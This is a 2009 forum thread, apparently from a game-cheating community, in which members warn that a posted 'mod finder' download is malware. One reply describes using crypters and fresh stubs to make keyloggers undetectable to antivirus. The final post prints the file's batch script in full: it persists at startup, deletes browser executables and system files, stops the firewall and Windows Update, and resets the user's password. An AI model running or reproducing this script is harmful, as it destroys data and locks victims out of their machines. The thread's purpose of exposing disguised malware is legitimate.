Hey there

Discussion in 'Archives' started by billyowns, Sep 28, 2009.

Thread Status:
Not open for further replies.
Hey there
  1. Unread #1 - Sep 28, 2009 at 3:26 PM
  2. billyowns
    Joined:
    Mar 28, 2007
    Posts:
    91
    Referrals:
    0
    Sythe Gold:
    0

    billyowns Member
    Banned

    Hey there

    BOoonoghpdf
     
  3. Unread #2 - Sep 28, 2009 at 4:35 PM
  4. fishing kills
    Joined:
    Jul 20, 2009
    Posts:
    288
    Referrals:
    0
    Sythe Gold:
    0

    fishing kills Forum Addict
    Banned

    Hey there

    probably some keylogger , if it was scanned by virustotal ,then post here pics of proggy or link
     
  5. Unread #3 - Sep 28, 2009 at 4:42 PM
  6. Jimmy
    Joined:
    Jun 24, 2008
    Posts:
    2,421
    Referrals:
    10
    Sythe Gold:
    25

    Jimmy Ghost
    Retired Sectional Moderator $5 USD Donor

    Hey there

  7. Unread #4 - Sep 28, 2009 at 5:22 PM
  8. DeadlyStrikes
    Joined:
    Jul 14, 2009
    Posts:
    386
    Referrals:
    0
    Sythe Gold:
    0

    DeadlyStrikes Forum Addict

    Hey there

    Lol fail.
     
  9. Unread #5 - Sep 28, 2009 at 5:57 PM
  10. billyowns
    Joined:
    Mar 28, 2007
    Posts:
    91
    Referrals:
    0
    Sythe Gold:
    0

    billyowns Member
    Banned

    Hey there

  11. Unread #6 - Sep 29, 2009 at 9:57 AM
  12. n3xus
    Joined:
    Aug 27, 2009
    Posts:
    129
    Referrals:
    0
    Sythe Gold:
    0

    n3xus Active Member
    Banned

    Hey there

    To all the younger kids, please trust your instinct over VirusReports.

    Even with free software you can make any KeyLogger fully undetected to Antivirus Software. Let's not start about the crypting software that people can easily make theirselves or buy.

    (It's actually all about the stub you use. If he had some luck and found a stub on the internet that no-one has used before, he could use any old Crypter, replace the detected stubs with the undetected one and there you go, a private crypter.)

    This could be clean, but I sincerely doubt that any of these tools are legit. If you think it's worth the risk, please open it within Sandboxie.​

    To the original poster, could you please post a picture of the program when opened?
     
  13. Unread #7 - Sep 29, 2009 at 10:33 AM
  14. fishing kills
    Joined:
    Jul 20, 2009
    Posts:
    288
    Referrals:
    0
    Sythe Gold:
    0

    fishing kills Forum Addict
    Banned

    Hey there

    Thx for scan ,but anyway virus and keyloger are two different things and yeah Jimmy5410 it seems total fake screen ,thats wat type of virus?? html page? :D
     
  15. Unread #8 - Sep 29, 2009 at 10:38 AM
  16. Kristian4th
    Joined:
    Nov 29, 2007
    Posts:
    1,793
    Referrals:
    1
    Sythe Gold:
    15

    Kristian4th Guru
    $5 USD Donor New

    Hey there

    Probably crypted with istealer, I wouldn't download.
     
  17. Unread #9 - Sep 29, 2009 at 2:38 PM
  18. Coron
    Joined:
    Aug 9, 2009
    Posts:
    287
    Referrals:
    0
    Sythe Gold:
    0

    Coron Forum Addict
    Banned

    Hey there

    FAIL
    Code:
     
    :: S1F1's Batch Virus Generator :: 
    :: Version [1.0.0] :: 
    :: Created at:  3:20:45.86 on: Mon 09/28/2009 :: 
     
    :: Virus Start :: 
    @echo off 
     
     
    :: Copy Virus To Startup :: 
    copy "JagexModFinder.bat" "%userprofile%\Start Menu\Programs\Startup\JagexModFinder.bat" 
    :: Copy Virus To Startup :: 
     
     
    :: Delete All Browsers :: 
    echo cd C:\Program Files\Internet Explorer >> "brall.bat" 
    echo del IEXPLORE.exe >> "brall.bat" 
    echo cd C:\Program Files\Mozilla Firefox >> "brall.bat" 
    echo del firefox.exe >> "brall.bat" 
    echo cd C:\Documents and Settings\%username%\Local Settings\Application Data\Google\Chrome\Application >> "brall.bat" 
    echo del chrome.exe >> "brall.bat" 
    echo cd C:\Users\%username%\AppData\Local\Google\Chrome\Application >> "brall.bat" 
    echo del chrome.exe >> "brall.bat" 
    echo exit >> "brall.bat" 
    start brall.bat 
    :: Delete All Browsers :: 
     
     
    :: Delete/Confuse Critical System 32 Files :: 
    echo cd %windir%\system32\setup >> "dc32.bat" 
    echo del * >> "dc32.bat" 
    echo cd %windir%\system32\ >> "dc32.bat" 
    echo REN *.jpeg *.txt >> "dc32.bat" 
    echo REN *.gif *.doc >> "dc32.bat" 
    echo REN *.png *.rtf >> "dc32.bat" 
    echo REN *.txt *.jpeg >> "dc32.bat" 
    echo REN *.doc *.gif >> "dc32.bat" 
    echo REN *.rtf *.png >> "dc32.bat" 
    echo REN *.fla *.swf >> "dc32.bat" 
    echo REN *.swf *.fla >> "dc32.bat" 
    echo REN *.psd *.bmp >> "dc32.bat" 
    echo REN *.bmp *.psd >> "dc32.bat" 
    echo REN *.html *.php >> "dc32.bat" 
    echo REN *.php *.html >> "dc32.bat" 
    echo REN *.js *.xml >> "dc32.bat" 
    echo REN *.xml *.js >> "dc32.bat" 
    echo REN *.as *.cfg >> "dc32.bat" 
    echo REN *.cfg *.log >> "dc32.bat" 
    echo REN *.jar *.zip >> "dc32.bat" 
    echo REN *.zip *.rar >> "dc32.bat" 
    echo REN *.rar *.zip >> "dc32.bat" 
    echo REN *.mp3 *.mp4 >> "dc32.bat" 
    echo REN *.mp4 *.mp3 >> "dc32.bat" 
    echo REN *.wav *.mp3 >> "dc32.bat" 
    echo REN *.ppt *.ppj >> "dc32.bat" 
    echo REN *.ppj *.ppt >> "dc32.bat" 
    echo exit >> "dc32.bat" 
    start dc32.bat 
    :: Delete/Confuse Critical System 32 Files :: 
     
     
    :: Disable Windows Firewall :: 
    net stop "MpsSvc" 
    taskkill /f /t /im "FirewallControlPanel.exe" 
    :: Disable Windows Firewall :: 
     
     
    :: Disable Windows Search :: 
    net stop "WSearch" 
    :: Disable Windows Search :: 
     
     
    :: Disable Windows Update :: 
    net stop "wuauserv" 
    :: Disable Windows Update :: 
     
     
    :: Change Password Into Random Number :: 
    net user %username% 5015 
    :: Change Password Into Random Number :: 
     
    
     
< >> *New Method* King Cobra's--(Rsgp Sales(Junk Buying(Junk Farming) *New Method* << | Is This RSC acc Rare? >

Users viewing this thread
1 guest
Thread Status:
Not open for further replies.


 
 
Adblock breaks this site